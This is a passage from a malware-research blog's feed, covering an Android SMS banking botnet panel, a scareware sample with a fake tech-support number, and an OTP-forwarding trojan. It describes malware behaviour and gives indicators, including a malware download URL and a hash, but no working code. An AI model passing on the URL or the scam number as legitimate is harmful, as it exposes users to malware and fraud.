</description><link>https://www.xylibox.com/2014/05/atsengine.html</link><author>noreply@blogger.com (Steven K)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPhLmFFYYiVauEai3wB2OJKKdX3U24LaqWezrJvqxVt5XUsvsCTJ4JZnlXAwLNlF8u8-HYJBiWH2lEYmnBP7uf0wtFRGLcna-izJmsr9AoR6IwdsJwJSy8b1W7Yv4UMuJ_uJapljqTZ1M/s72-c/2014-05-04_12-19-42.png" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5365964245877416061.post-8346825076151328872</guid><pubDate>Sun, 27 Apr 2014 20:36:00 +0000</pubDate><atom:updated>2014-04-27T22:36:47.158+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Android.Trojan.Rubobi.A</category><category domain="http://www.blogger.com/atom/ns#">SmsPiratBot</category><category domain="http://www.blogger.com/atom/ns#">Система управления SmsPiratBot</category><title>Android.Trojan.Rubobi.A (SmsPiratBot)</title><description>Another Android botnet dumped recently.&lt;br /&gt;
This malware can send and intercept sms from bots.&lt;br /&gt;
Like most of android botnets, they are used mainly to target mobile banks like Sberbank (www.sberbank.ru - the biggest bank in Russia)&lt;br /&gt;In Russia, you can transfer money from one card to another card through mobile sms&lt;br /&gt;
This botnet is sold 120$ &lt;br /&gt;
&lt;br /&gt;
Fake App:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9j1K9PEwEvWZolpHK-1spsmUFvwW7I3UlFMWhSYfdVk1SxdC6JU3CR_Oe0r8_SdHkgVebzhEXGt6DDoRPmhNSa8StEuWN7DmQQ6Vue74841VwsB48ynESpaVJpzkNvZPKLj1HaCh9mrA/s1600/19-04-2014+18-25-51.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9j1K9PEwEvWZolpHK-1spsmUFvwW7I3UlFMWhSYfdVk1SxdC6JU3CR_Oe0r8_SdHkgVebzhEXGt6DDoRPmhNSa8StEuWN7DmQQ6Vue74841VwsB48ynESpaVJpzkNvZPKLj1HaCh9mrA/s1600/19-04-2014+18-25-51.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
MD5: &lt;a href=&quot;http://www.foresafe.com/report/2EA5E73653D1454C04ECD48202DCC391&quot;&gt;2ea5e73653d1454c04ecd48202dcc391&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Login:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrJyBfy8X1lPZz4YqaLgX5EPjarx_08P6MsLC_zGcDglWIYHlQO7J6t7eohVu44tIB3oCYvIc5i6oZmtl-XFd8IIWtltLiP21K-V79cn6SA5FmwnULEvRVxr1rD2kRtJTuJu4gEI5tNpY/s1600/19-04-2014+18-00-30.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrJyBfy8X1lPZz4YqaLgX5EPjarx_08P6MsLC_zGcDglWIYHlQO7J6t7eohVu44tIB3oCYvIc5i6oZmtl-XFd8IIWtltLiP21K-V79cn6SA5FmwnULEvRVxr1rD2kRtJTuJu4gEI5tNpY/s1600/19-04-2014+18-00-30.png&quot; height=&quot;197&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
System Stats:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfQFxtnt-bpXURLhRZ67-QD0mtbnYIQEws9_sHWmMeUwD339UJqYSf2buxbACOnHRSWWS5uUO6KHDTVhHlNs43phzP8EcH0NzcsIOXZAU2QEgTo2K2r7FXvcWNJ35ZjMRWh_3VnwLleoQ/s1600/19-04-2014+18-10-46.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfQFxtnt-bpXURLhRZ67-QD0mtbnYIQEws9_sHWmMeUwD339UJqYSf2buxbACOnHRSWWS5uUO6KHDTVhHlNs43phzP8EcH0NzcsIOXZAU2QEgTo2K2r7FXvcWNJ35ZjMRWh_3VnwLleoQ/s1600/19-04-2014+18-10-46.png&quot; height=&quot;238&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Countries:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXHbt9vSGDmsAMotzx7jCXPpHshPx0XmqCKwwIxDbOFtwo2BGEpSRn1EK4sKz43pxHXFpQYEXjqmy_8ED0uNh8vJmZ-WeE1wPosvduZ4rJVx_sbsXKAICo8cF1Gn3Eo_9oflAx94OP8Og/s1600/19-04-2014+18-11-34.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXHbt9vSGDmsAMotzx7jCXPpHshPx0XmqCKwwIxDbOFtwo2BGEpSRn1EK4sKz43pxHXFpQYEXjqmy_8ED0uNh8vJmZ-WeE1wPosvduZ4rJVx_sbsXKAICo8cF1Gn3Eo_9oflAx94OP8Og/s1600/19-04-2014+18-11-34.png&quot; height=&quot;126&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Operators:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh01N4NpOG0xRIzHLs5cFiLfNhO2ITlb8WPlPP9Ke8GjlBNMtK_9eZeheaNvuCYtSQI7JEyzwaBhVF6OZwWRG0_iabKierQYlvSfMcB3odIAQiMaf8dh3Igp3sm6S7Yf69P6wDxKP-D190/s1600/19-04-2014+18-11-56.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh01N4NpOG0xRIzHLs5cFiLfNhO2ITlb8WPlPP9Ke8GjlBNMtK_9eZeheaNvuCYtSQI7JEyzwaBhVF6OZwWRG0_iabKierQYlvSfMcB3odIAQiMaf8dh3Igp3sm6S7Yf69P6wDxKP-D190/s1600/19-04-2014+18-11-56.png&quot; height=&quot;161&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Task Stats:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgckl68xyXSh8r6vHxYUvLU2uECD3tDXjo18jEbHx0AcCuTRX3F4PcDfmMuNgw6DYk3fP6gW3IIGU2TgfDEDe58swXEFzVu7MBOMvk6SZBGrD8HieqG3G04zw_CS5S9AGvYKXk21SwxiLY/s1600/19-04-2014+18-12-52.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgckl68xyXSh8r6vHxYUvLU2uECD3tDXjo18jEbHx0AcCuTRX3F4PcDfmMuNgw6DYk3fP6gW3IIGU2TgfDEDe58swXEFzVu7MBOMvk6SZBGrD8HieqG3G04zw_CS5S9AGvYKXk21SwxiLY/s1600/19-04-2014+18-12-52.png&quot; height=&quot;347&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Task Editor:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkjnbithIwOywWJnXv7QsmuE1PrmieAaXq_tNDqNA245pXdvqUffSTMiCZDe0FkBrxwDqoXt7znYzti5Rlx_JZcNoQcdsKfukdilgQmJvhbypOLjAYQFFhlqEcuJ5uyYUJnN67f_fUc40/s1600/19-04-2014+18-16-11.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkjnbithIwOywWJnXv7QsmuE1PrmieAaXq_tNDqNA245pXdvqUffSTMiCZDe0FkBrxwDqoXt7znYzti5Rlx_JZcNoQcdsKfukdilgQmJvhbypOLjAYQFFhlqEcuJ5uyYUJnN67f_fUc40/s1600/19-04-2014+18-16-11.png&quot; height=&quot;351&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Blacklist:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiv7Dr_yKMI6uDaKtklTtEYVpxiFSmmgSP4C1Y7J8thOupvTVZS_Gf8_GoDrFbdMQK4F8MZ08JfCL9pytEkKiCczPnUrahd8vWfEP150qHRid1VN06BU_i4U-aBKJ4mAck10xKyyleZwTk/s1600/19-04-2014+18-16-54.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiv7Dr_yKMI6uDaKtklTtEYVpxiFSmmgSP4C1Y7J8thOupvTVZS_Gf8_GoDrFbdMQK4F8MZ08JfCL9pytEkKiCczPnUrahd8vWfEP150qHRid1VN06BU_i4U-aBKJ4mAck10xKyyleZwTk/s1600/19-04-2014+18-16-54.png&quot; height=&quot;201&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Stored SMS:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHr4OXu04ao7tmZluSv0smk8ML4wZv6u1q1v5Yf5FasMEmh6lUTzOKFrT4X5xNt7yHuGBukx4KYRyCC-RQvr_NAnO_CvjcfRBeEvbdOhfrsFUVMc1e6Num7P9kjOoZg1oDJBNo_OgnuX0/s1600/19-04-2014+18-02-23.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHr4OXu04ao7tmZluSv0smk8ML4wZv6u1q1v5Yf5FasMEmh6lUTzOKFrT4X5xNt7yHuGBukx4KYRyCC-RQvr_NAnO_CvjcfRBeEvbdOhfrsFUVMc1e6Num7P9kjOoZg1oDJBNo_OgnuX0/s1600/19-04-2014+18-02-23.png&quot; height=&quot;341&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Another panel:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrdfNBs6XCAxEOxIw8RN5epdKwS6WHozQGJ4uOF1uBFjTVpQWr51Dw2f5O7j0a-WUp2geB1wsa9niHOYKyaC3ZgrFhil7-d_WKRpg5QKizYW0hL_IWlDG7-79HhVlIaYMWSCgt3V2v9Hs/s1600/20-04-2014+04-01-19.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrdfNBs6XCAxEOxIw8RN5epdKwS6WHozQGJ4uOF1uBFjTVpQWr51Dw2f5O7j0a-WUp2geB1wsa9niHOYKyaC3ZgrFhil7-d_WKRpg5QKizYW0hL_IWlDG7-79HhVlIaYMWSCgt3V2v9Hs/s1600/20-04-2014+04-01-19.png&quot; height=&quot;360&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Structure:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVORvhnQoKONT6pZcPGWY9hJawEj4lSBDHStkIFM2cHKkQ01ZM-T3kr8b7uutCwi_y3Tf8RVRradcMIsFpKvH7uf_QEN46QjDW5y9hcjs3XNHXDgmiw361vhsO6p6V-RVODmSaEJ1Y32g/s1600/20-04-2014+04-24-34.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVORvhnQoKONT6pZcPGWY9hJawEj4lSBDHStkIFM2cHKkQ01ZM-T3kr8b7uutCwi_y3Tf8RVRradcMIsFpKvH7uf_QEN46QjDW5y9hcjs3XNHXDgmiw361vhsO6p6V-RVODmSaEJ1Y32g/s1600/20-04-2014+04-24-34.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
</description><link>https://www.xylibox.com/2014/04/androidtrojanrubobia-smspiratbot.html</link><author>noreply@blogger.com (Steven K)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9j1K9PEwEvWZolpHK-1spsmUFvwW7I3UlFMWhSYfdVk1SxdC6JU3CR_Oe0r8_SdHkgVebzhEXGt6DDoRPmhNSa8StEuWN7DmQQ6Vue74841VwsB48ynESpaVJpzkNvZPKLj1HaCh9mrA/s72-c/19-04-2014+18-25-51.png" height="72" width="72"/><thr:total>5</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5365964245877416061.post-2692274593472783524</guid><pubDate>Sun, 27 Apr 2014 19:09:00 +0000</pubDate><atom:updated>2014-04-27T21:09:33.945+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">1-866-286-6162</category><category domain="http://www.blogger.com/atom/ns#">Scareware</category><category domain="http://www.blogger.com/atom/ns#">Your computer&#39;s file system has encountered a serious error. Please restart the computer or call support at 1-866-286-6162</category><title>Lame scareware</title><description>I&#39;ve found a sample yesterday downloaded via this url: &lt;a href=&quot;https://www.virustotal.com/en/url/680fdd7152a9019f62634c05c7dd197025c5c190f31198cca1c06fdb7cb46237/analysis/1398623762/&quot;&gt;skyways.co/play.exe&lt;/a&gt;, console application, and ugly code + scareware and third party FakeAV call center.&lt;br /&gt;
All the following was so lame that i need to talk about this.&lt;br /&gt;
&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4iJ4cXTxcuhWWBGDL9NLhtqP8OjEQ5dg-7sM6b4J-Qpk4_CM24XL8mkrlRkV8nBtQd0XQxMLMIj00wJ8gNlKNU4a3etJmLdRNRqpgOLudS3QAzyUSbEjMg9_kDUj22cxlpebk3rfpjYE/s1600/27-04-2014+20-53-52.png&quot; /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;At first the malware will try to see if he&#39;s dropped into %SYSTEMROOT%/system/&lt;br /&gt;
If it&#39;s not the case then he will create a file:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuPWFoUx4UbXBqLLhdyCEkZawI-5vOSWabCocICn9D4cZ9eDK3J1rK_e9WbxO09siNbu7CK8c8FUEOebC9eQAZRSeO8hYl6qxZEb1Os_CVFMs2TFCl1M7QXoHjLRiZeKEB7dM0OJ3X6rk/s1600/27-04-2014+19-33-11.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuPWFoUx4UbXBqLLhdyCEkZawI-5vOSWabCocICn9D4cZ9eDK3J1rK_e9WbxO09siNbu7CK8c8FUEOebC9eQAZRSeO8hYl6qxZEb1Os_CVFMs2TFCl1M7QXoHjLRiZeKEB7dM0OJ3X6rk/s1600/27-04-2014+19-33-11.png&quot; height=&quot;58&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Then, you think he will write into the new file created but nope, he add a registry persistence, by using the api CreateProcess (oh god, why) instead of using RegCreateKey:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAQ_ZcR52Dawy_hriWScuwdRH-mEnqkHS44TGum3T4gZVRlpfQBKirKMeEFG8XP_bkqER72cR2uiC_HIY9GtEq0CyCHWLepOlRS7xafCXax-rEUUwB0EuGAdmuHsNlVdT_xxc21n532xc/s1600/27-04-2014+19-45-52.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAQ_ZcR52Dawy_hriWScuwdRH-mEnqkHS44TGum3T4gZVRlpfQBKirKMeEFG8XP_bkqER72cR2uiC_HIY9GtEq0CyCHWLepOlRS7xafCXax-rEUUwB0EuGAdmuHsNlVdT_xxc21n532xc/s1600/27-04-2014+19-45-52.png&quot; height=&quot;60&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Wrote finally the file:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCkY0fsgoIXdr6RNt7H9Win4tdBJSZZ8B0dPqardOeV2PCjmZusKfIeIaqV23g9hrLnFIWU9XbdQ52MXO23mDGjoqiim8vQ94dwb8iEp0wTrLlkwydHwarp4NpWcpCJ9I2els7FUQT4VM/s1600/27-04-2014+19-58-05.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCkY0fsgoIXdr6RNt7H9Win4tdBJSZZ8B0dPqardOeV2PCjmZusKfIeIaqV23g9hrLnFIWU9XbdQ52MXO23mDGjoqiim8vQ94dwb8iEp0wTrLlkwydHwarp4NpWcpCJ9I2els7FUQT4VM/s1600/27-04-2014+19-58-05.png&quot; height=&quot;63&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Wait 5 minutes then display a message box:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvZ7OxYk4kYFark2nL7ap8-vWyD5M-h4ZakoHjdBCfIQpNkf2ZUZ-7JPppccUPdMI1EfaZDu0HiyMPC9ibe-wNy1drqQ1dmDCXot9cO1vZtUpZSDzaqb8rLgTXOinbT3v0V8XeBoTOEbw/s1600/27-04-2014+20-19-06.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvZ7OxYk4kYFark2nL7ap8-vWyD5M-h4ZakoHjdBCfIQpNkf2ZUZ-7JPppccUPdMI1EfaZDu0HiyMPC9ibe-wNy1drqQ1dmDCXot9cO1vZtUpZSDzaqb8rLgTXOinbT3v0V8XeBoTOEbw/s1600/27-04-2014+20-19-06.png&quot; height=&quot;88&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&quot;Your computer&#39;s file system has encountered a serious&amp;nbsp;error. Please restart the computer or call support at 1-866-286-6162&quot;&lt;br /&gt;
&lt;br /&gt;
After a reboot, a shutdown procedure is initialized:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEge_pPWXkC8XYooxKjvzvaH_7MV3HLOVrQJvUTAdyF7Kac2pDWQbchyz7zBkQ8aCPu-MfPhUH93_dxedAn7Clgni2e65VUy3o2JVcHdYbk6yXz73uqqNhFLegCYUQwdV81EiPTl8JfU8fA/s1600/27-04-2014+20-32-20.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEge_pPWXkC8XYooxKjvzvaH_7MV3HLOVrQJvUTAdyF7Kac2pDWQbchyz7zBkQ8aCPu-MfPhUH93_dxedAn7Clgni2e65VUy3o2JVcHdYbk6yXz73uqqNhFLegCYUQwdV81EiPTl8JfU8fA/s1600/27-04-2014+20-32-20.png&quot; height=&quot;107&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGFjphwJHnXtqeEPjcIlJfYtIGq8qBcjcE82IZ7E4JZTtYWfGd9jXsfDCNp-Pji_gIvTCJI3ihEGJjUmgV6GMl8z-P1f8t63EFDIiYoIu-QyP8JlpgfEmQZCZJWhqVCbm46EXBUfC8by8/s1600/27-04-2014+20-33-33.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGFjphwJHnXtqeEPjcIlJfYtIGq8qBcjcE82IZ7E4JZTtYWfGd9jXsfDCNp-Pji_gIvTCJI3ihEGJjUmgV6GMl8z-P1f8t63EFDIiYoIu-QyP8JlpgfEmQZCZJWhqVCbm46EXBUfC8by8/s1600/27-04-2014+20-33-33.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
And 5 minutes after, once again the messagebox:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJIZY7kALRkN9awpuUw-nki-9XRZTrNfeE8mD09iCW1YpgPFiEZ8QBkkH_wcyLPkcLO_BIhgLhEs_IWmBfEqZtxBxsYH6XS3f9jXC5nXE9sk7VII_HX9zeE4JGPC8voFmdW4gPimaQr8A/s1600/27-04-2014+20-38-31.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJIZY7kALRkN9awpuUw-nki-9XRZTrNfeE8mD09iCW1YpgPFiEZ8QBkkH_wcyLPkcLO_BIhgLhEs_IWmBfEqZtxBxsYH6XS3f9jXC5nXE9sk7VII_HX9zeE4JGPC8voFmdW4gPimaQr8A/s1600/27-04-2014+20-38-31.png&quot; height=&quot;220&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
I searched the phone number on google and found this:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguuSuPqK5JDW6kUBfqkQIhHYj8j4ftwprRYtJFqVLDEz0PPeN6XKE2Xihi7FphWMG0Mdn_xctGyI5BgGezjHfvowWKgvGyGOAR3XSwIFabLEHZqkmvrSW42rfRJqH_UKXQewOvOgRayB4/s1600/27-04-2014+20-42-08.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguuSuPqK5JDW6kUBfqkQIhHYj8j4ftwprRYtJFqVLDEz0PPeN6XKE2Xihi7FphWMG0Mdn_xctGyI5BgGezjHfvowWKgvGyGOAR3XSwIFabLEHZqkmvrSW42rfRJqH_UKXQewOvOgRayB4/s1600/27-04-2014+20-42-08.png&quot; height=&quot;313&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&quot;Technicion is an independent provider of on-demand tech support and not affiliated with any third party&quot;&lt;br /&gt;
&lt;br /&gt;
ok, what&#39;s about the payement page:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXxMa59UKDJS2h-6fWwCM9UW4CgQdh8I8uvdqgbbE0vM0UHR3twKHaLdCsTyCZu_SbkfwXIdFWq_xgaTD5mj4XC70IS0V6WTlgr7TFzDnX6XM_3P2QLran8lCCjo0MpLzpJ9btMuo5f40/s1600/27-04-2014+20-46-09.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXxMa59UKDJS2h-6fWwCM9UW4CgQdh8I8uvdqgbbE0vM0UHR3twKHaLdCsTyCZu_SbkfwXIdFWq_xgaTD5mj4XC70IS0V6WTlgr7TFzDnX6XM_3P2QLran8lCCjo0MpLzpJ9btMuo5f40/s1600/27-04-2014+20-46-09.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
Just 99.99 without any explanation, even the currency symbol is unknown, what a serious site.&lt;br /&gt;
&lt;br /&gt;
And for the story i tried to call 1-866-286-6162 to insult them and tell them how much i hate their ugly code etc.. but there was no available representatives..</description><link>https://www.xylibox.com/2014/04/lame-scareware.html</link><author>noreply@blogger.com (Steven K)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4iJ4cXTxcuhWWBGDL9NLhtqP8OjEQ5dg-7sM6b4J-Qpk4_CM24XL8mkrlRkV8nBtQd0XQxMLMIj00wJ8gNlKNU4a3etJmLdRNRqpgOLudS3QAzyUSbEjMg9_kDUj22cxlpebk3rfpjYE/s72-c/27-04-2014+20-53-52.png" height="72" width="72"/><thr:total>6</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5365964245877416061.post-1605772860571362722</guid><pubDate>Sun, 20 Apr 2014 11:07:00 +0000</pubDate><atom:updated>2014-04-20T13:07:41.087+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Android/FakeToken.A</category><category domain="http://www.blogger.com/atom/ns#">Botnet</category><category domain="http://www.blogger.com/atom/ns#">botnet phone</category><category domain="http://www.blogger.com/atom/ns#">OTP forwarder</category><category domain="http://www.blogger.com/atom/ns#">Phone</category><category domain="http://www.blogger.com/atom/ns#">SMS</category><title>Android/FakeToken.A</title><description>OTP forwarder dumped months ago.&lt;br /&gt;
&lt;br /&gt;
Login:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9bf6LrIl99slYpJGtwaHTxAbshCD16vntPzsszqJqklEIs0q9d8wYIOsYp6n1uZ7nu063PM-sCkXDhZKqhK_IxItV0lbVrwrLB7s0GgWm2jiRpphzM9UmRz7KlXF8ZZ7nxhZQe28ECW0/s1600/28-11-2013+21-15-57.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9bf6LrIl99slYpJGtwaHTxAbshCD16vntPzsszqJqklEIs0q9d8wYIOsYp6n1uZ7nu063PM-sCkXDhZKqhK_IxItV0lbVrwrLB7s0GgWm2jiRpphzM9UmRz7KlXF8ZZ7nxhZQe28ECW0/s1600/28-11-2013+21-15-57.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Statistics:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
